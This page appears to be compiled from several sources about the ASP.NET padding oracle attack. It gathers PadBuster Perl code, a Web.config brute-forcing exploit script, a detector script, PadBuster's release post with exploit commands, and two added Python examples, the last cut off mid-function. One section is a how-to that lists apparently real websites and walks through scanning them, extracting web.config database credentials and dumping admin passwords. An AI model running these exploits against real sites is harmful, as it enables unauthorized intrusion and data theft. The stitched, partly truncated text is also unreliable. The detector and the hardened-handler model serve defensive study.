    return $returnValue;
}

sub makeRequest {
    my ($method, $url, $data, $cookie) = @_;
    my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);
    my $numRetries = 0;
    $data = '' unless $data;
    $cookie = '' unless $cookie;
    $requestTracker++;
    do {
        # Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed)
        $ENV{HTTPS_PROXY} = "";
        $lwp = LWP::UserAgent->new(env_proxy => 1,
                                   keep_alive => 1,
                                   timeout => 30,
                                   requests_redirectable => [],
                                   );
        $req = new HTTP::Request $method => $url;
        &myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose;
        # Add request content for POST and PUT
        if ($data) {
            $req->content_type('application/x-www-form-urlencoded');
            $req->content($data);
        }
        if ($proxy) {
            my $proxyUrl = "http://";
            if ($proxyAuth) {
                my ($proxyUser, $proxyPass) = split(":",$proxyAuth);
                $ENV{HTTPS_PROXY_USERNAME} = $proxyUser;
                $ENV{HTTPS_PROXY_PASSWORD} = $proxyPass;
                $proxyUrl .= $proxyAuth."@";
            }
            $proxyUrl .= $proxy;
            $lwp->proxy(['http'], "http://".$proxy);
            $ENV{HTTPS_PROXY} = "http://".$proxy;
        }
        if ($auth) {
            my ($httpuser, $httppass) = split(/:/,$auth);
            $req->authorization_basic($httpuser, $httppass);
        }
        # If cookies are defined, add a COOKIE header
        if ($cookie ne "") {
            $req->header(Cookie => $cookie);
        }
        if ($headers) {
            my @customHeaders = split(/;/i,$headers);
            for (my $i = 0; $i <= $#customHeaders; $i++) {
                my ($headerName, $headerVal) = split(/::/i,$customHeaders[$i]);
                $req->header($headerName, $headerVal);
            }
        }
        my $startTime = &gettimeofday();
        my $response = $lwp->request($req);
        my $endTime = &gettimeofday();
        $timeTracker = $timeTracker + ($endTime - $startTime);
        if ($printStats == 1 && $requestTracker % 250 == 0) {
            # Average over the 250 requests accumulated since the last reset
            print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/250).")\n";
            $timeTracker = 0;
        }
        # Extract the required attributes from the response
        $status = substr($response->status_line, 0, 3);
        $content = $response->content;
        &myPrint("Response Content:\n$content",0) if $superVerbose;
        $location = $response->header("Location");
        if (!$location) {
            $location = "N/A";
        }
        #$contentLength = $response->header("Content-Length");
        $contentLength = length($content);
        my $contentEncoding = $response->header("Content-Encoding");
        if ($contentEncoding) {
            if ($contentEncoding =~ /GZIP/i) {
                $content = Compress::Zlib::memGunzip($content);
                $contentLength = length($content);
            }
        }
        my $statusMsg = $response->status_line;
        #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1);
        if ($statusMsg =~ /Can't connect/) {
            print "ERROR: $statusMsg\n   Retrying in 10 seconds...\n\n";
            $noConnect = 1;
            $numRetries++;
            sleep 10;
        } else {
            $noConnect = 0;
            $totalRequests++;
        }
    } until (($noConnect == 0) || ($numRetries >= 15));
    if ($numRetries >= 15) {
        &myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0);
        exit;
    }
    return ($status, $content, $location, $contentLength);
}

sub myPrint {
    my ($printData, $printLevel) = @_;
    $printData .= "\n";
    if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) {
        print $printData;
        &writeFile("ActivityLog.txt",$printData);
    }
}
sub myEncode {
    my ($toEncode, $format) = @_;
    return &encodeDecode($toEncode, 0, $format);
}

sub myDecode {
    my ($toDecode, $format) = @_;
    return &encodeDecode($toDecode, 1, $format);
}

sub encodeDecode {
    my ($toEncodeDecode, $oper, $format) = @_;
    # Oper: 0=Encode, 1=Decode
    # Format: 0=Base64, 1=Hex Lower, 2=Hex Upper, 3=NetUrlToken, 4=Web64
    my $returnVal = "";
    if ($format == 1 || $format == 2) {
        # HEX
        if ($oper == 1) {
            # Decode (always convert to lower case when decoding)
            $toEncodeDecode = lc($toEncodeDecode);
            $returnVal = pack("H*",$toEncodeDecode);
        } else {
            # Encode
            $returnVal = unpack("H*",$toEncodeDecode);
            if ($format == 2) {
                # Uppercase
                $returnVal = uc($returnVal);
            }
        }
    } elsif ($format == 3) {
        # NetUrlToken
        if ($oper == 1) {
            $returnVal = &web64Decode($toEncodeDecode,1);
        } else {
            $returnVal = &web64Encode($toEncodeDecode,1);
        }
    } elsif ($format == 4) {
        # Web64
        if ($oper == 1) {
            $returnVal = &web64Decode($toEncodeDecode,0);
        } else {
            $returnVal = &web64Encode($toEncodeDecode,0);
        }
    } else {
        # B64
        if ($oper == 1) {
            $returnVal = &decode_base64($toEncodeDecode);
        } else {
            $returnVal = &encode_base64($toEncodeDecode);
            $returnVal =~ s/(\r|\n)//g;
        }
    }
    return $returnVal;
}

sub web64Encode {
    my ($input, $net) = @_;
    # net: 0=No Padding Number, 1=Padding (NetUrlToken)
    $input = &encode_base64($input);
    $input =~ s/(\r|\n)//g;
    $input =~ s/\+/-/g;
    $input =~ s/\//_/g;
    # Strip the '=' padding and remember how many characters were removed
    my $count = $input =~ s/=//g;
    $count = 0 if ($count eq "");
    $input .= $count if ($net == 1);
    return $input;
}

sub web64Decode {
    my ($input, $net) = @_;
    # net: 0=No Padding Number, 1=Padding (NetUrlToken)
    $input =~ s/-/+/g;
    $input =~ s/_/\//g;
    if ($net == 1) {
        # The trailing digit is the number of '=' padding characters to restore
        my $count = chop($input);
        $input = $input.("=" x int($count));
    }
    return &decode_base64($input);
}

sub promptUser {
    my ($prompt, $default, $yn) = @_;
    my $defaultValue = $default ? "[$default]" : "";
    print "$prompt $defaultValue: ";
    chomp(my $input = <STDIN>);
    $input = $input ? $input : $default;
    if ($yn) {
        if ($input =~ /^y|n|a$/) {
            return $input;
        } else {
            return &promptUser($prompt, $default, $yn);
        }
    } else {
        if ($input =~ /^-?\d/ && $input > 0 && $input < 256) {
            return $input;
        } else {
            return &promptUser($prompt, $default);
        }
    }
}

sub writeFile {
    my ($fileName, $fileContent) = @_;
    if ($logFiles) {
        if ($dirExists != 1) {
            system($dirCmd." ".$dirName);
            $dirExists = 1;
        }
        $fileName = $dirName.$dirSlash.$fileName;
        open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n";
        print $OUTFILE $fileContent;
        close($OUTFILE);
    }
}

sub getTime {
    my ($format) = @_;
    my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) = localtime(time);
    my @months = ("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC");
    my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT");
    $month = sprintf("%02d",$month);
    $day = sprintf("%02d",$day);
    $hour = sprintf("%02d",$hour);
    $minute = sprintf("%02d",$minute);
    $second = sprintf("%02d", $second);
    # localtime() returns years since 1900 (e.g. 114); keep the last two digits
    $year =~ s/^.//;
    if ($format eq "F") {
        return $day.$months[$month].$year."-".(($hour * 3600) + ($minute * 60) + ($second));
    } elsif ($format eq "S") {
        return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second;
    } else {
        return $hour.":".$minute.":".$second;
    }
}

• Web.config_bruter.pl

#!/usr/bin/perl
#
#
# Webconfig Bruter - exploit tool for downloading Web.config
#
# To use this script you need Padbuster.
# Padbuster is a great tool and Brian Holyfield deserves all the credits.
#
#
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
#
use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;

# Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;
my $testUrl = $ARGV[0]."?d=";
my $sampleBytes = $ARGV[1];
my $blockSize = $ARGV[2];
if ($#ARGV < 2) {
    die "
Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize

Where:
  URL             = The target URL (and query string if applicable)
  EncryptedSample = The encrypted value you want to use. This needs to come from Padbuster.
  BlockSize       = The block size being used by the algorithm (8 or 16)

Poc code by giorgio.fedon@mindedsecurity.com
Original Padbuster code from Brian Holyfield - Gotham Digital Science

Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16
";
}
my $method = "GET";
$sampleBytes = encoder($sampleBytes, 1);
my $testBytes = "\x00" x $blockSize;
my $counter = 0;
# Use random bytes
my @nums = (0..255);
my $status = 1;
while ($status) {
    # Fuzz the test bytes
    for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
        substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
    }
    # Combine the test bytes and the sample
    my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
    chomp($combinedTestBytes);
    $combinedTestBytes =~ s/%0A//g;
    # Ok, now make the request
    my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes);
    if ($status eq "200") {
        # Remove this for "T" exploit
        if (index($content,"parent.Sys.Application") == -1) {
            print $content."\n\n";
            print "Total Requests:".$counter."\n\n";
            print "Resulting Exploit Block:".$combinedTestBytes."\n\n";
            last;
        }
    }
    $counter++;
}

# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
#
# I also did the encoder / decoder, but your logic is definitely better
sub encoder {
    my ($toEncodeDecode, $oper) = @_;
    # UrlDecoder / Encoder for the .NET NetUrlToken format
    if ($oper == 1) {
        $toEncodeDecode =~ s/-/+/g;
        $toEncodeDecode =~ s/_/\//g;
        my $count = chop($toEncodeDecode);
        $toEncodeDecode = $toEncodeDecode.("=" x int($count));
        $returnVal = decode_base64($toEncodeDecode);
    } else {
        $b64Encoded = encode_base64($toEncodeDecode);
        $b64Encoded =~ s/(\r|\n)//g;
        $b64Encoded =~ s/\+/-/g;
        $b64Encoded =~ s/\//_/g;
        my $count = $b64Encoded =~ s/=//g;
        ($count eq "") ? ($count = 0) : "";
        $returnVal = $b64Encoded.$count;
    }
    return $returnVal;
}

sub makeRequest {
    my ($method, $url) = @_;
    my ($lwp, $status, $content, $req, $location, $contentLength);
    # Setup LWP UserAgent
    $lwp = LWP::UserAgent->new(env_proxy => 1,
                               keep_alive => 1,
                               timeout => 30,
                               requests_redirectable => [],
                               );
    $req = new HTTP::Request $method => $url;
    my $response = $lwp->request($req);
    # Extract the required attributes from the response
    $status = substr($response->status_line, 0, 3);
    $content = $response->content;
    #print $content;
    $location = $response->header("Location");
    if ($location eq "") {
        $location = "N/A";
    }
    $contentLength = $response->header("Content-Length");
    return ($status, $content, $location, $contentLength);
}

• AspNetPaddingOracleDetector.js [JavaScript]

/*
----------------------------------------
AspNetPaddingOracleDetector for ASP.NET
----------------------------------------
Duncan Smart, http://blog.dotsmart.net/
*/
if (!WScript.FullName.match(/cscript.exe$/i)) {
    // Re-run in command prompt
    new ActiveXObject("WScript.Shell").Run('cmd.exe /c cscript.exe //E:JScript //nologo "' + WScript.ScriptFullName + '" & pause');
    WScript.Quit(0);
}

var siteRoot;
if (WScript.Arguments.Unnamed.Count != 1) {
    WScript.Echo("Enter site URL: ");
    siteRoot = WScript.StdIn.ReadLine();
} else {
    siteRoot = WScript.Arguments.Unnamed.Item(0);
}
// Append root slash if necessary
if (!siteRoot.match("/$")) siteRoot += "/";
WScript.Echo("Testing site: " + siteRoot);
//TODO: add more tests for other padding oracles
var response1 = httpGet(siteRoot + "webresource.axd?aspxerrorpath=bar");
var response2 = httpGet(siteRoot + "webresource.axd?d=foo&aspxerrorpath=bar");

// Compare HTTP statuses
if (response1.status != response2.status) {
    WScript.Echo("MIGHT BE VULNERABLE: HTTP status mismatch");
    WScript.Echo("\r\n=== Response 1 ===");
    WScript.Echo(response1.status);
    WScript.Echo("\r\n=== Response 2 ===");
    WScript.Echo(response2.status);
    WScript.Quit(1);
}

// Compare headers
if (response1.headers != response2.headers) {
    WScript.Echo("MIGHT BE VULNERABLE: HTTP headers mismatch");
    WScript.Echo("\r\n=== Response 1 ===");
    WScript.Echo(response1.headers);
    WScript.Echo("\r\n=== Response 2 ===");
    WScript.Echo(response2.headers);
    WScript.Quit(1);
}

// Compare HTML
if (response1.body != response2.body) {
    WScript.Echo("MIGHT BE VULNERABLE: HTTP body mismatch");
    WScript.Echo("=== Response 1 ===");
    WScript.Echo(response1.body);
    WScript.Echo("");
    WScript.Echo("=== Response 2 ===");
    WScript.Echo(response2.body);
    WScript.Quit(1);
}

WScript.Echo("Site might be OK: WebResource.axd is not acting as a padding oracle");
WScript.Quit(0);
// ====== Utilities ======
function httpGet(url) {
    var http = new ActiveXObject("Microsoft.XMLHTTP");
    http.open("GET", url, /*async*/ false);
    try {
        http.send();
    } catch (err) {
        return {'status': null, 'headers': null, 'body': null};
    }
    var headers = http.getAllResponseHeaders().split(/\r\n/);
    // Remove "Date" header as that will likely be different!
    headers = filter(headers, function(h) { return !h.match("^Date:"); });
    return {
        status: http.status + " " + http.statusText,
        headers: headers.join("\r\n"),
        body: http.responseText
    };
}

// Filters array to items that satisfy 'where' function
function filter(array, where) {
    var newArray = [];
    for (var i = 0; i < array.length; i++) {
        if (where(array[i])) newArray.push(array[i]);
    }
    return newArray;
}

• ListSite.txt [A blank file in which you write the website names]

Eg.
http://moitruongsuckhoe.vn
http://simpleway.vn
http://sieuthi.xuctienthuongmai.vn
http://footballonline.vn
http://hdradio.vn
http://domucgiare.com

• CheckPaddingOracle.bat [A batch program for checking for the oracle vulnerability]
@echo off
setLocal EnableDelayedExpansion
for /f "tokens=* delims= " %%a in (ListSite.txt) do (
    cscript //nologo AspNetPaddingOracleDetector.js %%a
    echo.
)
cmd

How To:

• Go to any ASP.NET-related website. Do a reverse IP domain check and find the server and other sites.
• Copy all sites to Notepad and save the file as ListSite.txt.
• Run CheckPaddingOracle.bat; the script will check each website in the list for the vulnerability.
• Open the vulnerable site and check its source code for:
  /WebResource.axd?d=
  /ScriptResource.axd?d=
• Scenario I: the extracted PaddingOracle.rar has a folder that contains all the scripts: exe.bat, padBuster.pl and web.config_Bruter.pl. Now,
• Open exe.bat and run padBuster.pl.
• Command: ..\perl.exe padBuster.pl http://madeinvietnam.net/WebResource.axd?d=2uT3s0_S0xTW7_RW6mW1q2 2uT3s0_S0xTW7_RW6mW1q2 16 -encoding 3 -plaintext "|||~/web.config"
• Choose ID 2.
• Now you have the encrypted value: T-2QM86TZAAAAAAAAAAAAAAAAAAAAAA1
• Now construct another command like: ..\perl.exe Web.Config_Bruter.pl http://madeinvietnam.net/ScriptResource.axd - 2QM86TZAAAAAAAAAAAAAAAAAAAAAA1
• Copy this command to exe.bat and run it.
• You will get the resulting exploit block: gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0
• Create a link: http://madeinvietnam.net/ScriptResource.axd?d=gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0
• Open it in your web browser.
• You will find one XML script now.
• Find the keyword: connection
• In that line you will get the source address, user ID and password.
• Now open MS SQL and connect to the database.
• Now the whole database is dumped onto your PC, or you could say I am connected to their database. Now find the admin tables and columns and open them up.
• You can simply right-click on the admin table > select top 1000 rows.
• OK, you have got your admin and its password now.
• If the password is not encrypted then fine, but if, like in our case, the password is encrypted, then you have to intercept the password through Burp Suite, OR if you can decrypt the password, awesome...
• Open Burp Suite > Proxy > Intercept on
PADBUSTER V0.3 AND THE .NET PADDING ORACLE ATTACK

Now that a weekend has passed since the .NET patch was released, and since there is already a working public example of how to reliably download a web.config using the padding oracle attack, we have decided to finally release v0.3 of PadBuster with the "Brute Force" option. This option is specifically designed to handle scenarios where the first block of ciphertext cannot be crafted using CBC-R due to a secret IV. This feature was NOT designed specifically for the .NET attack, as our intention for PadBuster is to be a universal tool for identifying and exploiting padding oracles in any web application. That being said, the brute force option CAN be used to reliably perform a web.config download attack within a reasonable number of requests.

Before discussing how to perform this attack using PadBuster, and some of the other new features in this version, it's worth noting that there are more efficient ways to perform the web.config download attack using ScriptResource.axd. The T-Block brute force attack vector, which was originally pointed out to me by James Martin of ESP Technologies and is also discussed here by Giorgio Fedon of Minded Security, is significantly faster and more efficient. This technique, however, is pretty specific to the .NET ScriptResource.axd attack and as such is not likely to be incorporated into PadBuster (a separate exploit script is probably warranted).

The web.config attack using PadBuster is essentially a three step process. I will assume that the reader is already familiar with the specifics of why the script resource handler is vulnerable to a file download attack. If you are not familiar with the underlying issue, you can read about it here, here and here.

Step 1: Encrypt the Payload using CBC-R

The first step of the attack is to identify a component that is vulnerable to the padding oracle attack and use it to encrypt the web.config payload (|||~/web.config). This can typically be done in a few ways:

1 - Using WebResource.axd as a padding oracle for CBC-R.
If CustomErrors are NOT enabled, then you don't even need a valid ciphertext sample to exploit the oracle...you can use an encoded dummy value of all NULLs instead (AAAAAAAAAAAAAAAAAAAAAA2).

padBuster.pl http://www.myapp.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAAAA2 AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config"

If CustomErrors ARE enabled, you can still use WebResource.axd as the oracle. The caveat, however, is that you'll need to use a valid ciphertext query string sample and use the -prefix option so that PadBuster sends this sample as the prefix of each test request.

padBuster.pl http://www.myapp.com/WebResource.axd?d=1s45vAJre3GVd98iQoAjgQ2 1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config" -prefix 1s45vAJre3GVd98iQoAjgQ2

2 - Using ScriptResource.axd as a padding oracle for CBC-R.

Like with the web resource handler, this is pretty straightforward if CustomErrors are not enabled:

padBuster.pl http://www.myapp.com/ScriptResource.axd?d=1s45vAJre3GVd98iQoAjgQ2 1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config"

If CustomErrors ARE enabled, this handler can also be used as a padding oracle. The interesting thing about this technique is that it seems to work despite implementing all of the workarounds that Microsoft recommended before the patch was issued (CustomErrors using RedirectMode and optional Sleep). This technique, however, requires use of the brute force option so I'll come back to that in a bit.

Step 2: Verify the encrypted payload does NOT include pipes

This step is optional, but certainly worth performing to ensure that you aren't headed down a dead end road. In order for the exploit to work, the payload you send to the handler (including the "garbage" IV block) CANNOT include any pipe characters. If it does, the payload will never work. To verify this, you can use the padding oracle to decrypt your payload and verify its contents. So assuming that Step 1 produced a payload value of "iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1", then the following command would be used to verify the contents of the payload. Make sure to use the -noiv option as the first block is the one you are most interested in.

padBuster.pl http://www.myapp.com/WebResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -noiv

So what if your payload DOES include pipes? Not to fear, there's an easy workaround for this too. You may have noticed that when you decrypt samples using PadBuster, it prints the HEX encoded Ciphertext Bytes and Intermediate Bytes with the results of each block. You can optionally use any of these pairs along with the -ciphertext and -intermediate switches to feed PadBuster a known pair of ciphertext/intermediate values for use during CBC-R encryption. Using any one of these pairs to encrypt your exploit payload should produce a different payload than would otherwise be generated by PadBuster on its own, which can then be verified to ensure that it does not contain pipes.

Step 3: Brute force the first block

Now that you have a valid payload, the final step is to obtain the first block that will trigger the file download logic. The reason this step is tricky is that the Framework typically does not pass an IV along with the ciphertext. As such, we can't use the padding oracle to reliably produce our desired first block. The good news is that since you only need the first two bytes of the decrypted value to trigger our exploit (either Q#, q#, R# or r#) you can essentially brute force the needed block with fairly reliable success. And the even better news is that you'd be surprised at how quick it is to blindly brute force one of these values.

The approach taken by PadBuster is similar, but slightly different, than the approach used by the Web.config Bruter script released by Giorgio Fedon. I must again credit James Martin for originally sharing his proof of concept exploit code with me that leveraged this technique for identifying the first block. Instead of random block values, however, PadBuster performs a sequential brute force starting with all NULLs. The sequential brute force ensures that you never attempt the same block value more than once and also allows you to resume the brute force where you left off if the script gets killed (using the -resume option). The example shown below assumes the payload from our Step 2 example above:
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -bruteforce -log

PadBuster's brute force mode works similar to the other modes of PadBuster, where the first step is an automated response analysis. The main difference is that rather than identifying a padding error, you want to identify an error that indicates failure of the brute force attempt rather than success. In most cases, you may have only one response to choose from...which is totally fine (unless one of the initial 256 fuzzing attempts produces a different response). In the case of ScriptResource.axd, there's a good chance you'll have more than one as shown below.

INFO: Starting PadBuster Brute Force Mode
[+] Starting response analysis...

*** Response Analysis Complete ***

The following response signatures were returned:
-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       200     337     N/A
2 **    255     404     1524    N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended :

The reason for the 200 response included above is the T-Block. For our purposes, we are not using the T-Block so we can select signature #2 (the 404). PadBuster will continue issuing brute force attempts and notify you of every response that does not match this signature. You'll likely get several T-Block hits similar to the 200 response shown above before you hit a block that returns the web.config as shown below (this is just an excerpt from the output):

Attempt 4275 - Status: 200 - Content Length: 367
http://www.myapp.com/ScriptResource.axd?d=igA4AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0
Attempt 4561 - Status: 200 - Content Length: 360
http://www.myapp.com/ScriptResource.axd?d=4AA4AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0
Attempt 4792 - Status: 200 - Content Length: 100277
http://www.myapp.com/ScriptResource.axd?d=xwA5AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0
Attempt 5353 - Status: 200 - Content Length: 359
http://www.myapp.com/ScriptResource.axd?d=BAA6AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0

As you can imagine, it's difficult to tell whether these responses contain anything meaningful based solely on the data that is printed to the screen. In the case of this exploit, we know that the web.config file is likely going to be much larger than the small T-Block responses which average around 500 Bytes. You can actually see that in the excerpt above: attempt number 4792 shows a much larger content length...this is the response that contains the web.config file. The inclusion of unwanted T-Block responses in our output is a result of our desire to maintain PadBuster as a universal tool that is not specific to a particular vulnerability such as this one.

You may also have noticed that our original command made use of another new option (-log). The "log" option tells PadBuster to log various output files in an automatically generated folder using the PadBuster.DDMMYY-TIME naming convention. This option is critical for use in brute force mode, since each matching response is logged to this folder and can be easily reviewed to determine whether the brute force attempt worked. For the case of a web.config download exploit, I recommend running the above command and monitoring the output folder to determine when a significantly larger response file gets created.

Bypassing the Workarounds

Now that you've seen how to retrieve the web.config, let's go back to an alternate technique for using ScriptResource.axd as a padding oracle. As I mentioned previously, this technique works despite implementing the recommended workarounds initially presented by Microsoft in their guidance preceding the patch release. To start, you'll need a valid ciphertext sample. The sample, however, does not have to be valid for the script resource handler (it can be taken from any Framework component...most easily from the WebResource.axd query string).

Step 1: Find a valid T-Block Request

Using the obtained sample, along with the -bruteforce option, the following command can be used to quickly brute force a valid T-Block. The following example assumes that we were able to obtain a valid "d" value from a link to the web resource handler (/WebResource.axd?d=qmZbysenet6VGS94Ord8gQ2&t=633768217780468750).

padBuster.pl http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2 qmZbysenet6VGS94Ord8gQ2 16 -encoding 3 -bruteforce

Once you run PadBuster with these options, and select the default error pattern, you should get a 200 response within the first few hundred requests similar to the one shown below:

Attempt 60 - Status: 200 - Content Length: 337
http://www.myapp.com/ScriptResource.axd?d=OwAAAAAAAAAAAAAAAAAAAKpmW8rHp3relRkveDq3fIE1

Step 2: Use the obtained T-Block with the -prefix option

Now you can leverage the obtained T-Block request, along with the -prefix option, to use the script resource handler as a padding oracle as shown below.

padBuster.pl http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2 qmZbysenet6VGS94Ord8gQ2 16 -encoding 3 -noiv -prefix OwAAAAAAAAAAAAAAAAAAAKpmW8rHp3relRkveDq3fIE1

The examples above hopefully demonstrate how to use the new features of PadBuster for performing various exploits against the .NET framework. Our plan is to add more features to PadBuster where they make sense, specifically features that can be useful against a wide variety of padding oracle attack vectors. As always, send us your feedback, modifications, bug reports, or general comments so that we can incorporate them into future versions.
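Added example, not PadBuster's or the post's own code: a Python version of the NetUrlToken format that PadBuster's encodeDecode format 3 (web64Encode/web64Decode with the trailing padding count) implements and that the -encoding 3 option in the commands above selects. It decodes the two values the post quotes (the all-NULL dummy AAAAAAAAAAAAAAAAAAAAAA2 and the Step 2 payload) back into 16-byte blocks; describe_token is an added helper that a defender can use to check whether a d= value seen in logs is a well-formed token and which of its blocks are all zero.

```python
import base64


def net_url_token_encode(data: bytes) -> str:
    """.NET URL-token encoding: base64 with +/ mapped to -_ and the '='
    padding replaced by a single digit giving how many '=' were stripped."""
    b64 = base64.b64encode(data).decode("ascii")
    body = b64.rstrip("=")
    return body.replace("+", "-").replace("/", "_") + str(len(b64) - len(body))


def net_url_token_decode(token: str) -> bytes:
    """Inverse of net_url_token_encode; rejects tokens without a valid count digit."""
    if len(token) < 2 or token[-1] not in "012":
        raise ValueError("NetUrlToken must end in a padding count of 0, 1 or 2")
    body, pad = token[:-1], int(token[-1])
    body = body.replace("-", "+").replace("_", "/")
    return base64.b64decode(body + "=" * pad, validate=True)


def describe_token(token: str, block_size: int = 16) -> dict:
    """Added helper: block structure of a decoded token (raises if it is not
    a whole number of blocks, which a genuine CBC ciphertext always is)."""
    raw = net_url_token_decode(token)
    if len(raw) % block_size:
        raise ValueError(f"{len(raw)} bytes is not a multiple of {block_size}")
    blocks = [raw[i:i + block_size] for i in range(0, len(raw), block_size)]
    return {
        "bytes": len(raw),
        "blocks": len(blocks),
        "zero_blocks": [i for i, b in enumerate(blocks) if b == bytes(block_size)],
    }


# Values quoted in the post: the all-NULL dummy sample and the Step 2 payload
# (22 base64 characters + count 2 = 16 bytes; 43 characters + count 1 = 32 bytes).
NULL_TOKEN = "A" * 22 + "2"
PAYLOAD_TOKEN = "iJBC6whziIIWQhKYX4KDpw" + "A" * 21 + "1"

if __name__ == "__main__":
    print(describe_token(NULL_TOKEN))     # {'bytes': 16, 'blocks': 1, 'zero_blocks': [0]}
    print(describe_token(PAYLOAD_TOKEN))  # {'bytes': 32, 'blocks': 2, 'zero_blocks': [1]}
```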
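Added example, not PadBuster's, the post's or the tutorial's code: a self-contained Python model of the two handler designs the post contrasts. A constructed toy block cipher stands in for AES (the oracle depends only on CBC chaining, PKCS#7 and a distinguishable error). leaky_handler reports padding failures distinctly and so leaks one plaintext block to the same byte-at-a-time XOR-with-padding loop that PadBuster's processBlock runs; hardened_handler authenticates IV||ciphertext with an HMAC before decrypting, so every tampered query gets one answer and the same loop finds nothing, which is what the CustomErrors/RedirectMode/Sleep workarounds the post describes do not achieve. Keys, IV and the sample plaintext are all constructed.

```python
import hashlib
import hmac

BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 16-byte block cipher, a constructed stand-in for AES: nothing below depends on it.
def _block_encrypt(key: bytes, block: bytes) -> bytes:
    x = _xor(block, key)
    return x[1:] + x[:1]

def _block_decrypt(key: bytes, block: bytes) -> bytes:
    return _xor(block[-1:] + block[:-1], key)

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = _block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(_block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def leaky_handler(key: bytes, token: bytes) -> int:
    """Decrypts first and reports a padding failure distinctly: this is the oracle."""
    try:
        pkcs7_unpad(cbc_decrypt(key, token[:BLOCK], token[BLOCK:]))
        return 200
    except ValueError:
        return 500

def hardened_handler(enc_key: bytes, mac_key: bytes, token: bytes) -> int:
    """Checks an HMAC over IV||ciphertext before any decryption; every tampered
    or malformed token gets the same answer, so there is nothing to distinguish."""
    body, tag = token[:-32], token[-32:]
    expected = hmac.new(mac_key, body, hashlib.sha256).digest()
    if len(body) < 2 * BLOCK or not hmac.compare_digest(expected, tag):
        return 404
    try:
        pkcs7_unpad(cbc_decrypt(enc_key, body[:BLOCK], body[BLOCK:]))
        return 200
    except ValueError:
        return 404  # a padding failure looks exactly like a MAC failure

def recover_block(oracle, prev_block: bytes, target: bytes) -> bytes:
    """What the oracle leaks: one plaintext block in at most 16*256 queries, via the
    same byte-at-a-time XOR-with-padding step that PadBuster's processBlock performs."""
    intermediate = bytearray(BLOCK)                 # D_k(target), recovered right to left
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        test = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):             # pin already-known bytes to 'pad'
            test[k] = intermediate[k] ^ pad
        for guess in range(256):
            test[pos] = guess
            if oracle(bytes(test) + target) != 200:
                continue
            if pos == BLOCK - 1:                    # rule out an accidental \x02\x02 hit
                alt = bytearray(test)
                alt[pos - 1] ^= 0x01
                if oracle(bytes(alt) + target) != 200:
                    continue
            intermediate[pos] = guess ^ pad
            break
        else:
            raise RuntimeError(f"no padding hit at byte {pos}: the oracle is closed")
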